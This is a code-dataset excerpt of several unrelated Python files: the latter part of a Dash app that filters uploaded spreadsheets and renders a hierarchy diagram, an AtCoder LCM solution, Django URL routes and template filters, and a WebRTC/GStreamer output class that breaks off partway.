dbc.Card(dbc.CardBody([\n html.Div(dbc.Card(dbc.CardBody([\n html.H4(id=\"columnName\"),\n dbc.Checklist(\n id=\"column\",\n value=[],inline=True\n )]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n html.Br(), \n dbc.Collapse(\n # html.Br(),\n html.Div(dbc.Card(dbc.CardBody([\n html.H4(id=\"columnName1\"),\n dbc.Checklist(\n id=\"column1\",\n # options=[{\"label\": o, \"value\": o} for o in df['Year'].unique()],\n value=[]\n )]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"), \n id=\"column1_collapse\",\n is_open=False) ,html.Br(),\n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4(id=\"columnName2\"),\n dbc.Checklist(\n id=\"column2\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n id='column2_collapse',is_open=False,\n ),html.Br(),\n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4(id=\"columnName3\"),\n dbc.Checklist(\n id=\"column3\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\",\n \".inner-border\":\"-webkit-scrollbar\"},className=\"no-scrollbars\"\n ),\n id='column3_collapse',is_open=False,\n ),html.Br(),\n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4(id=\"columnName4\"),\n dbc.Checklist(\n id=\"column4\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\n \"overflow-x\": \"hidden\",\"background\": \"transparent\"},className=\"no-scrollbars\"),\n id='column4_collapse',is_open=False,\n )]),\n outline=True, color=\"dark\"), \n id=\"contract_collapse\",\n is_open=False), \n html.Br(), \n html.Br(), \n html.Button(id=\"submit-button\", className=\"mr-1\", n_clicks=0,\n style={'background-color': '#38ACEC',\n 'border': 'none',\n 'color': 'white',\n 'padding': '10px 32px',\n 'text-align': 'center',\n 'text-decoration': 'none',\n 'display': 'inline-block',\n 'font-size': '16px',\n 'border-radius': '4px'}), \n ], vertical=True,\n pills=True)\n ],\n id='sidebar',\n style=SIDEBAR_STYLE,className=\"no-scrollbars\"\n)\n\n\n\ncontent = html.Div(id=\"page-content1\", style=CONTENT_STYLE,)\napp.layout = html.Div([dcc.Location(id='page-2-display-value'),\n sidebar, content, html.Br(),dcc.Loading(id=\"loading-1\",type=\"default\",\n children=html.Div(id=\"loading-output-1\"),className='_dash-loading-callback'),\n dcc.Store(id='side_click'),dcc.ConfirmDialog(id='confirm-danger',\n message='Graph size too large if you want to download it click ok'),dcc.Store(id='image-size'),\n dcc.Download(id=\"download-image\")])\n\ndef parse_data(contents, filename,opt,value):\n global df\n if opt is None:\n opt=0\n if contents:\n content_type, content_string = contents.split(\",\")\n # print(len(opt))\n decoded = base64.b64decode(content_string)\n if (len(opt)>1) and (len(value)>0) :\n # print(value)\n xl = pd.ExcelFile(io.BytesIO(decoded))\n df=pd.read_excel(xl,sheet_name=value)\n return df\n elif (len(opt)==1) or (len(opt)==0):\n if \"csv\" in filename:\n # Assume that the user uploaded a CSV or TXT file\n df = pd.read_csv(io.StringIO(decoded.decode(\"utf-8\")))\n elif (\"xls\" in filename) or ('xlsx' in filename):\n print(filename)\n # Assume that the user uploaded an excel file\n df = pd.read_excel(io.BytesIO(decoded))\n elif (\"txt\" in filename) or (\"tsv\" in filename):\n # Assume that the user upl, delimiter = r'\\s+'oaded an excel file\n df = pd.read_csv(io.StringIO(decoded.decode(\"utf-8\")), delimiter=r\"\\s+\")\n # except Exception as e:\n # print(e)\n # return html.Div([\"There was an error processing this file.\"])\n\n # return df \n # def data_disply(contents, filename):\n # if contents:\n # contents = contents[0]\n # filename = filename[0]\n # df = parse_data(contents, filename)\n # return df\n return df\n\n@app.callback(Output(\"y_collapse-button\",\"hidden\"),\n [Input(\"columns\",\"value\"),\n Input(\"Filters\",\"value\")]) \ndef applyFilters_collapse(value1,value2):\n if (len(value1)>0) and (len(value2)>0):\n return False\n return True\n@app.callback(Output(\"side_click\",\"data\"),\n [Input(\"upload\", \"contents\"), Input(\"upload\", \"filename\"),\n Input('radioitems','options'),\n Input('radioitems','value')])\ndef data(contents, filename,opt,value):\n if opt is None:\n opt=[]\n if len(opt)>1:\n if (contents) and (len(value)>0):\n df1=parse_data(contents, filename,opt,value)\n return df1.to_dict('records')\n elif (len(opt)==1) or (len(opt)==0):\n if contents:\n df1=parse_data(contents, filename,opt,value)\n print(df1)\n return df1.to_dict('records')\n\n@app.callback(\n Output(\"contract_collapse\", \"is_open\"),\n [Input(\"y_collapse-button\", \"n_clicks\")],\n [State(\"contract_collapse\", \"is_open\")],\n)\ndef y_toggle_collapse(n, is_open):\n if n :\n return not is_open\n return is_open\n\n@app.callback(Output('column','options'),\n Output(\"columnName\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef first_filter(data,values):\n # try:\n if (data) and (len(values)>0):\n data=pd.DataFrame(data)\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n data=data[data[values[0]].isnull()==False]\n\n return [{\"label\":x,\"value\":x} for x in data[values[0]].unique()],values[0]\n else:\n return [],'' \n # except:\n # print(\"exit\")\n # return [],''\n\n@app.callback(Output('column1_collapse','is_open'),\n [Input('column','value'),Input('column1','options')],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse1(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column1','options'),\n Output(\"columnName1\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef second_filter(data,values):\n # try:\n if (data) and (len(values)>1):\n data=pd.DataFrame(data)\n data=data[data[values[1]].isnull()==False]\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[1]].unique()],values[1]\n else:\n return [],'' \n\n@app.callback(Output('column2_collapse','is_open'),\n [Input('column1','value'),Input('column2','options')],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse2(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column2','options'),\n Output(\"columnName2\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef third_filter(data,values):\n # try:\n if (data) and (len(values)>2):\n data=pd.DataFrame(data)\n data=data[data[values[2]].isnull()==False]\n # print(data[values[2]].isnull().sum())\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[2]].unique()],values[2]\n else:\n return [],'' \n\n@app.callback(Output('column3_collapse','is_open'),\n [Input('column2','value'),Input(\"column3\",\"options\")],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse3(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column3','options'),\n Output(\"columnName3\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef four_filter(data,values):\n # try:\n if (data) and (len(values)>3):\n data=pd.DataFrame(data)\n data=data[data[values[3]].isnull()==False]\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[3]].unique()],values[3]\n else:\n return [],'' \n\n@app.callback(Output('column4_collapse','is_open'),\n [Input('column3','value'),Input(\"column4\",\"options\")],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse3(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column4','options'),\n Output(\"columnName4\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef four_filter(data,values):\n # try:\n if (data) and (len(values)>4):\n data=pd.DataFrame(data)\n data=data[data[values[4]].isnull()==False]\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[4]].unique()],values[4]\n else:\n return [],'' \n# @app.callback(Output('browsers','options'),\n# [Input('year','value')])\n\n# def Quarter_value(n):\n# data=df.loc[df['Year'].isin(n),['Quarters']]\n# return[{\"label\": 'Q'+str(x), \"value\": x} for x in data['Quarters'].unique()] \n\n\n\n# @app.callback(\n# Output('submit-button', 'hidden'),\n# [Input('y_collapse-button','n_clicks')]\n# )\n# def show_button(n_clicks):\n# if (n_clicks%2 == 0):\n# return True\n# else:\n# return False\n@app.callback(Output('card_collapse','is_open'),\n [Input(\"upload\", \"contents\"),Input(\"y_collapse-button\",\"n_clicks\")])\ndef card(content,nclick):\n # print(nclick%2)\n if (content) and (nclick%2==0):\n return True\n elif nclick%2!=0:\n return False\n\n@app.callback(Output('columns_collapse','is_open'),\n [Input(\"upload\", \"contents\"),Input('radioitems','options'),\n Input('radioitems','value')])\ndef column_collapase(contents,options,value):\n if options is None:\n options=[]\n if len(options)>1:\n if (contents) and (len(value)>0):\n return True\n return False\n elif (len(options)==1) or (len(options)==0):\n if contents:\n return True\n return False\n\n@app.callback(Output('Filters_collapse','is_open'),\n [Input('columns','value')])\ndef filter_collapse(value):\n if len(value)>0:\n return True\n return False\n\n@app.callback(Output('sheet_values','is_open'),\n [Input(\"upload\", \"contents\"),Input(\"radioitems\",'options')])\ndef options_collapse(file,options):\n if options is None:\n options=[]\n if (file) and (len(options)>1):\n return True\n return False\n\n@app.callback(Output(\"radioitems\",\"options\"),\n [Input(\"upload\", \"contents\"), Input(\"upload\", \"filename\")])\ndef options1(contents, filename):\n value=list()\n \n if (contents):\n if (\"xlsx\" in filename) or (\"xls\" in filename):\n content_type, content_string = contents.split(\",\")\n\n decoded = base64.b64decode(content_string)\n # # try:\n xl = pd.ExcelFile(io.BytesIO(decoded))\n [value.append(y)for y in xl.sheet_names]\n # print(len(value))\n if len(value)>0: \n return [{'label':x,'value':x} for x in value]\n else:\n return [] \n # except:\n # return []\n\n@app.callback(Output('columns','options'),\n [Input(\"side_click\",\"data\"),Input('radioitems','options'),\n Input('radioitems','value')])\ndef column_names(data,opt,value):\n # print(opt)\n # print(data)\n if opt is None:\n opt=[]\n columns=list()\n if len(opt)>1:\n if (data) and (len(value)>0):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns]) \n elif (len(opt)==1) or (len(opt)==0):\n if (data):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns]) \n return [{'label':x,'value':x} for x in columns]\n\n@app.callback(Output('Filters','options'),\n [Input(\"side_click\",\"data\"),Input('radioitems','options'),\n Input('radioitems','value'),Input(\"Filters\",\"value\")])\ndef column_names(data,opt,value,value1):\n columns=list()\n # print(opt)\n if opt is None:\n opt=[]\n if (len(opt)>1):\n if (data) and (len(value)>0):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns]) \n elif (len(opt)==1) or (len(opt)==0) or (opt is None):\n if (data):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns])\n if len(value1)==5:\n options=list()\n for i in df.columns:\n if i in value1:\n options.append({'label':i,'value':i})\n else:\n options.append({'label':i,'value':i,\"disabled\": True})\n return options\n else: \n return [{'label':x,'value':x} for x in columns]\n\n@app.callback(Output('column_collapse','is_open'),\n [Input('upload','contents')])\ndef column_collapse(content):\n if content:\n return True\n return False \n\n@app.callback(Output('submit-button','children'),\n [Input(\"submit-button\",\"n_clicks\")])\ndef button_name(n_clicks):\n if n_clicks%2==0:\n return [\"Generate Graph\"]\n elif n_clicks%2!=0:\n return [\"Back To Grid\"]\n\n@app.callback(Output('confirm-danger','displayed'),\n [Input('image-size','data')])\ndef display_conifm(value):\n if int(value)>1000:\n return True\n return False\n@app.callback(Output('download-image','data'),\n [Input('confirm-danger','submit_n_clicks')]) \ndef download_image(n_clicks):\n # print(n_clicks)\n if n_clicks is None:\n n_clicks=0\n # if (n_clicks is None):\n # return []\n if (int(n_clicks)>0):\n return dcc.send_file(\"assets\\\\root.png\") \n\nloc_fun={\n 1:'df1.loc[df1[filters[0]].isin(value),:]',\n 2:'df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1)),:]',\n 3:\"df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1))&(df1[filters[2]].isin(value2)),:]\",\n 4:\"\"\"df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1))&(df1[filters[2]].isin(value2))&\n (df1[filters[3]].isin(value3)),:]\"\"\",\n 5:\"\"\"df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1))&(df1[filters[2]].isin(value2))&\n (df1[filters[3]].isin(value3))&(df1[filters[4]].isin(value4)),:]\"\"\"}\n\n\nlen_fun={\n 1:\"[len(value)]\",\n 2:\"[len(value),len(value1)]\",\n 3:\"[len(value),len(value1),len(value2)]\",\n 4:\"[len(value),len(value1),len(value2),len(value3)]\",\n 5:\"[len(value),len(value1),len(value2),len(value3),len(value4)]\"}\n\ngraph_sorted={2:\"{columns[0]:len(final_data[columns[0]].unique()),columns[1]:len(final_data[columns[1]].unique())}\",\n 3:\"\"\"{columns[0]:len(final_data[columns[0]].unique()),columns[1]:len(final_data[columns[1]].unique()),\n columns[2]:len(final_data[columns[2]].unique())}\"\"\",\n 4:\"\"\"{columns[0]:len(final_data[columns[0]].unique()),columns[1]:len(final_data[columns[1]].unique()),\n columns[2]:len(final_data[columns[2]].unique()),columns[3]:len(final_data[columns[3]].unique())}\"\"\"}\n\n\n@app.callback(Output(\"submit-button\",\"hidden\"),\n [Input(\"Filters\",\"value\"),Input(\"column\",\"value\"),\n Input('column1',\"value\"),Input('column2',\"value\"),\n Input(\"column3\",\"value\"),Input(\"column4\",\"value\")])\ndef generateGraph(filters,value,value1,value2,value3,value4):\n # print(value1)\n if len(filters)>0:\n valueslen=eval(len_fun[len(filters)])\n print(valueslen)\n if all(valueslen)>0:\n return False\n return True\n else:\n return True\n\n\n@app.callback([Output(\"page-content1\",\"children\"),\n Output(\"loading-output-1\", \"style\"),Output('image-size','data')], \n [Input('columns','value'),Input(\"side_click\",\"data\"),Input(\"Filters\",\"value\"),\n Input(\"column\",\"value\"),Input('column1',\"value\"),Input('column2',\"value\"),\n Input(\"column3\",\"value\"),Input(\"column4\",\"value\"),Input(\"submit-button\",\"n_clicks\")])\ndef output_data(columns,data,filters,value,value1,value2,value3,value4,n_clicks):\n if len(filters)>0:\n # print(eval(len_fun[len(filters)]))\n lenValues=eval(len_fun[len(filters)])\n # lenValues.append(len(columns))\n if (data) and (all(lenValues)>0) and (n_clicks%2 == 0):\n df1=pd.DataFrame(data)\n filter_data=eval(loc_fun[len(filters)])\n final_data=filter_data.loc[:,columns]\n time.sleep(1)\n return dash_table.DataTable(final_data.to_dict('records'), [{\"name\": i, \"id\": i} for i in final_data.columns],\n style_data={\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'lineHeight': '15px',\n 'color': 'black',\n 'backgroundColor': 'white',\n 'border': '1px solid black'\n },style_cell_conditional=[ \n {\"if\": {\"column_id\": c}, \"textAlign\": \"center\"} for c in final_data.columns\n ],\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(220, 220, 220)',\n }],\n style_header={\n 'backgroundColor': 'rgb(210, 210, 210)',\n 'color': 'black',\n 'fontWeight': 'bold',\n 'border': '1px solid black',\n \"textAlign\": \"center\"\n },style_table={\"width\":\"950px\"},\n ),{\"align\":\"center\"},'0'\n elif (all(lenValues)>0) and (n_clicks%2 != 0):\n df1=pd.DataFrame(data)\n filter_data=eval(loc_fun[len(filters)])\n final_data=filter_data.loc[:,columns]\n # print(final_data)\n listAlphabets=list(string.ascii_uppercase)+list(string.ascii_lowercase)\n if (len(columns)>1):\n keyValue=len(columns)\n if len(columns)>4:\n keyValue=4\n columns=eval(graph_sorted[keyValue])\n columns={k:j for k,j in sorted(columns.items(),key=lambda item:item[1])}\n columns=list(columns.keys())\n else:\n columns=columns \n root = AnyNode(id=\"Hierarchy\")\n rootnode=dict()\n # print(rootnode)\n try:\n for i,j in enumerate(final_data[columns[0]].unique()):\n name=re.sub(r'[\\s\\W]','',str(j))\n rootnode[f\"s{i}\"]=j\n globals()[f\"s{i}\"] = AnyNode(id=j)\n # print(rootnode)\n except:\n []\n try: \n subnode={}\n for key,value in rootnode.items():\n subNode_Data=final_data.loc[final_data[columns[0]]==value,[columns[1]]]\n for i,j in enumerate(subNode_Data[columns[1]].unique()):\n name=re.sub(r'[\\s\\W]','',str(j))\n subnode[f\"s{name}{listAlphabets[i]}\"]=j\n globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key))\n listAlphabets.remove(listAlphabets[i])\n except:\n []\n try:\n\n # print(subnode) \n subnode1={} \n subnode_test=subnode.copy() \n for key,value in rootnode.items():\n subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n value_check=[]\n for key1,value1 in list(subnode_test.items()):\n if value1 not in value_check:\n subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n value_check.append(value1)\n # print(value_check)\n # print(subNode_Data1)\n \n for i,j in enumerate(subNode_Data1[columns[2]].unique()):\n # print(key1)\n name=re.sub(r'[\\s\\W]','',str(j))\n subnode1[f\"s{name}{listAlphabets[i]}\"]=j\n globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key1))\n listAlphabets.remove(listAlphabets[i])\n try:\n if len(subnode_test)>1:\n subnode_test.pop(key1)\n except:\n pass \n else:\n pass\n except:\n [] \n\n\n\n # print(subnode) \n # print(subnode1) \n try: \n subnode2={} \n subnode_test=subnode.copy()\n subnode1_test=subnode1.copy() \n for key,value in rootnode.items():\n subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n # print(subnode1_test)\n value_check=[]\n for key1,value1 in list(subnode_test.items()):\n if value1 not in value_check:\n subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n value_check.append(value1)\n # print(value_check)\n # print(subNode_Data1)\n value_check1=[]\n # key_check=[]\n for key2,value2 in list(subnode1_test.items()):\n if value2 not in value_check1:\n subNode_Data2=subNode_Data1.loc[subNode_Data1[columns[2]]==value2,:]\n value_check1.append(value2)\n # key_check.append(key2)\n print(subNode_Data2)\n for i,j in enumerate(subNode_Data2[columns[3]].unique()):\n # print(key2)\n name=re.sub(r'[\\s\\W]','',str(j))\n subnode2[f\"s{name}{listAlphabets[i]}\"]=j\n globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key2))\n listAlphabets.remove(listAlphabets[i])\n\n try:\n if len(subnode_test)>1:\n subnode_test.pop(key1) \n if len(subnode1_test)>1:\n subnode1_test.pop(key2)\n except:\n pass \n else:\n pass \n\n else:\n pass \n except:\n []\n \n \n # print(subnode1)\n # try: \n # subnode2={}\n # subnode_test=subnode.copy()\n # subnode1_test=subnode1.copy() \n\n # for key,value in rootnode.items():\n # subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n # value_check=[]\n # value_check1=[]\n # # print(subnode_test)\n # # print(subnode1_test) \n # for key1,value1 in list(subnode_test.items()):\n # if value1 not in value_check:\n # subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n # value_check.append(value1)\n # # print(value_check)\n\n \n \n # # print(value_check1)\n # for key2,value2 in list(subnode1_test.items()):\n # if value2 not in value_check1:\n # print(value2)\n # subNode_Data2=subNode_Data1.loc[subNode_Data1[columns[2]]==value2,:]\n # value_check1.append(value2)\n # # print(len(subnode1_test))\n # # print(subNode_Data2)\n\n \n # # print(subNode_Data2)\n # for i,j in enumerate(subNode_Data2[columns[3]].unique()):\n # # print(subnode1_test)\n # print(key2)\n # name=re.sub(r'[\\s\\W]','',str(j))\n # subnode2[f\"s{name}{listAlphabets[i]}\"]=j\n # globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key2))\n # listAlphabets.remove(listAlphabets[i])\n # # print(subnode1_test)\n # # if (len(subnode_test)>1): \n # # subnode_test.pop(key1)\n # # if (len(subnode1_test)>1):\n # # subnode1_test.pop(key2)\n # # print(subnode_test)\n\n # else:\n # pass\n # else:\n # pass \n # except:\n # [] \n # print(subnode2)\n # subnode3={}\n # subnode_test=subnode.copy()\n # subnode1_test=subnode1.copy()\n # subnode2_test=subnode2.copy()\n # for key,value in rootnode.items(): \n # subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n # value_check=[]\n # for key1,value1 in list(subnode_test.items()):\n # if value1 not in value_check:\n # subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n # value_check.append(value1)\n\n # value_check1=[]\n # for key2,value2 in list(subnode1_test.items()):\n # if value2 not in value_check1:\n # subNode_Data2=subNode_Data1.loc[subNode_Data1[columns[2]]==value2,:]\n # value_check1.append(value2)\n # if (len(subnode1_test)>1) and (len(subnode1_test)>1):\n # subnode1_test.pop(key2)\n # subnode_test.pop(key1) \n # value_check2=[]\n # for key3,value3 in list(subnode2_test.items()):\n # if value3 not in value_check2:\n # subNode_Data3=subNode_Data2.loc[subNode_Data2[columns[3]]==value3,:] \n # value_check2.append(value3)\n # if len(subnode2_test)>1:\n # subnode2_test.pop(key3)\n # print(subnode2_test) \n # # print(subNode_Data3) \n # for i,j in enumerate(subNode_Data3[columns[4]].unique()):\n # # print(j)\n # name=re.sub(r'[\\s\\W]','',str(j))\n # subnode3[f\"{listAlphabets[i]}s{name}\"]=j\n # print(key3)\n # globals()[f\"{listAlphabets[i]}s{name}\"] = AnyNode(id=j, parent=eval(key3))\n\n # # if len(subnode2_test)>1:\n # # subnode2_test.pop(key3) \n \n # else:\n # pass\n # else:\n # pass \n # else:\n # pass \n # print(subnode3)\n UniqueDotExporter(s0,\n nodeattrfunc=lambda n: 'shape=box,label=\"%s\"' % (n.id)).to_picture('root.jpg') \n image_filename = r'C:\\Users\\Gopi\\OneDrive - PiLog India Private Limited\\Desktop\\spendHierarchy\\root.jpg' # replace with your own image\n img=Image.open(image_filename)\n width,height = img.size\n print(width,height)\n encoded_image = base64.b64encode(open(image_filename, 'rb').read())\n \n return (dbc.Card(dbc.CardBody(html.Img(src='data:image/png;base64,{}'.format(encoded_image.decode()))),\n style={\"width\":f\"{width+25}px\"}),{\"align\":\"center\"},width)\n else:\n return dbc.Card([\n dbc.CardBody([\n html.H3(\"Welcome to DashBoard\", className=\"card-title\"),\n # html.P(\"Click on '☰ ' to get or collapse Sidebar.\"),\n html.P(\"Select required values in the Sidebar to Generate Graphs.\",className='card-text')\n ])\n ],color='secondary',inverse=True),{\"align\":\"center\"},'0'\n \n else:\n return dbc.Card([\n dbc.CardBody([\n html.H3(\"Welcome to DashBoard\", className=\"card-title\"),\n # html.P(\"Click on '☰ ' to get or collapse Sidebar.\"),\n html.P(\"Select required values in the Sidebar to Generate Graphs.\",className='card-text')\n ])\n ],color='secondary',inverse=True),{\"align\":\"center\"},'0'\n \nif __name__ == \"__main__\":\n app.run_server(port=8000)\n","repo_name":"gopikrishna225/SpendHierarchy","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":36357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28898873657","text":"import fractions\nimport sys\ninput = sys.stdin.readline\n\n\ndef lcm(x, y):\n return (x * y) // fractions.gcd(x, y)\n\n\ndef main():\n A, B = map(int, input().split())\n\n print(lcm(A, B))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"suuungwoo/AtCoder","sub_path":"abc/148/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26612500178","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('login/', views.login_user, name=\"login\"),\n path(\"signup/\", views.signup_user, name=\"signup\"),\n path(\"logout/\", views.logout_user, name=\"logout\"),\n \n path(\"forms/\", views.dashboard_forms, name=\"forms\"),\n path(\"forms/\", views.dashboard_new_form, name=\"form-add\"),\n path('forms/update/', views.dashboard_update_form, name='form-update' ),\n path(\"forms-inbox/\", views.dashboard_form_inbox, name=\"forms-inbox\"),\n path(\"forms-inbox/roles/\", views.get_role_users, name=\"forms-inbox-roles\"),\n\n\n path(\"forms-admin/\", views.dashboard_forms_admin, name=\"forms-admin\"),\n path(\"forms-admin/update\", views.dashboard_forms_admin_update, name=\"forms-admin-update\"),\n path(\"forms-admin/new\", views.new_form_admin, name=\"newform\"),\n\n \n path(\"\", views.dashboard, name=\"dashboard\")\n]","repo_name":"yazdan2014/Easy-Connection-Website","sub_path":"EasyConnectionSoftware/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36485884247","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter(name='is_item_id_in_list')\ndef is_item_id_in_list(item_list, item_id):\n return any(int(item.get('item_id')) == item_id for item in item_list)\n\n\n@register.simple_tag(name='find_quantity')\ndef find_quantity(item_list, item_id, date, time):\n products = 0\n for item in item_list:\n if str(item.get('item_id')) == str(item_id):\n if int(item_id) > 23:\n if str(item.get('date')) == str(date):\n return len(time)\n elif date == \"\":\n products += item.get('quantity')\n else:\n continue\n else:\n return item.get('quantity')\n return products\n\n@register.simple_tag(name='find_item_subtotal')\ndef find_item_subtotal(item_list, item_id):\n for item in item_list:\n if str(item.get('item_id')) == str(item_id):\n return item.get('item_subtotal')\n return 0","repo_name":"ryanmcnally93/project-four-ascension","sub_path":"products/templatetags/custom_filters.py","file_name":"custom_filters.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16263790233","text":"import asyncio\nfrom sfu.media import OutputMedia\nfrom sfu.participant import WebsocketParticipant\n\nfrom gi.repository import Gst\nfrom sfu.gst_utils import link_many\nfrom gi.repository import GstWebRTC\nfrom gi.repository import GstSdp\nfrom sfu.gst_utils import send_eos_and_wait, wait_for_pending_state_none\nimport threading\nimport time\n\n\nclass WebrtcOutput(OutputMedia):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.media_pipeline = kwargs['media_pipeline']\n ws = kwargs['ws']\n participant_id = kwargs['participant_id']\n\n self.participant = WebsocketParticipant(participant_id=participant_id)\n self.add_participant_handler()\n self.participant.set_ws(ws)\n self.input = None\n self.webrtcbin = None\n self.elements = []\n self.pipeline = None\n self.signal_connections = []\n self.tee_pad_links = []\n\n def add_participant_handler(self):\n class Handler:\n async def handle_payload(payload):\n try:\n media_id = payload['media_id']\n if media_id != self.media_id:\n return\n except KeyError:\n return\n\n try:\n payload_type = payload['type']\n except KeyError:\n return\n\n if payload_type == 'answer':\n self.handle_answer(payload)\n return\n\n if payload_type == 'ice_candidate':\n self.handle_remote_ice_candidate(payload)\n return\n\n async def handle_close():\n await self.media_pipeline.remove_output_media(self)\n\n self.participant.add_handler(Handler)\n\n def set_input_media(self, input_obj):\n self.input = input_obj\n\n def get_input_media(self):\n return self.input\n\n async def add_to_pipeline(self, pipeline):\n print('add to pipeline')\n\n self.webrtcbin = Gst.ElementFactory.make('webrtcbin')\n pipeline.add(self.webrtcbin)\n self.webrtcbin.set_property('stun-server', 'stun://stun.l.google.com:19302')\n self.signal_connections.extend([\n self.webrtcbin.connect('on-negotiation-needed', self.on_negotiation_needed),\n self.webrtcbin.connect('on-ice-candidate', self.on_ice_candidate),\n ])\n\n try:\n tees = [t[1] async for t in self.input.get_tees()]\n except Exception as e:\n raise e\n\n print('got tees')\n\n for t in tees:\n queue = Gst.ElementFactory.make('queue')\n queue.set_property('leaky', 1)\n queue.set_property('silent', True)\n pipeline.add(queue)\n tee_pad = t.get_request_pad('src_%u')\n queue_pad = queue.get_static_pad('sink')\n tee_pad.link(queue_pad)\n self.tee_pad_links.append((t, tee_pad, queue_pad))\n link_many(queue, self.webrtcbin)\n queue.set_state(Gst.State.PLAYING)\n self.elements.append(queue)\n\n self.webrtcbin.set_state(Gst.State.PLAYING)\n\n self.pipeline = pipeline\n\n def on_negotiation_needed(self, element):\n promise = Gst.Promise.new_with_change_func(self.on_offer_created, element)\n element.emit('create-offer', None, promise)\n\n def on_offer_created(self, promise, element):\n\n promise.wait()\n reply = promise.get_reply()\n offer = reply.get_value('offer')\n sdp_text = offer.sdp.as_text()\n\n msg = {\n 'media_id': self.media_id,\n 'type': 'offer',\n 'sdp': sdp_text,\n }\n if offer.type != GstWebRTC.WebRTCSDPType.OFFER:\n return\n\n set_local_description_promise = Gst.Promise.new()\n element.emit('set-local-description', offer, set_local_description_promise)\n promise.wait()\n loop = asyncio.new_event_loop()\n try:\n loop.run_until_complete(self.participant.send_payload(msg))\n except Exception:\n pass\n\n def on_ice_candidate(self, element, mlineindex, candidate):\n\n payload = {\n 'media_id': self.media_id,\n 'type': 'ice_candidate',\n 'ice': {'candidate': candidate, 'sdpMLineIndex': mlineindex}\n }\n loop = asyncio.new_event_loop()\n try:\n 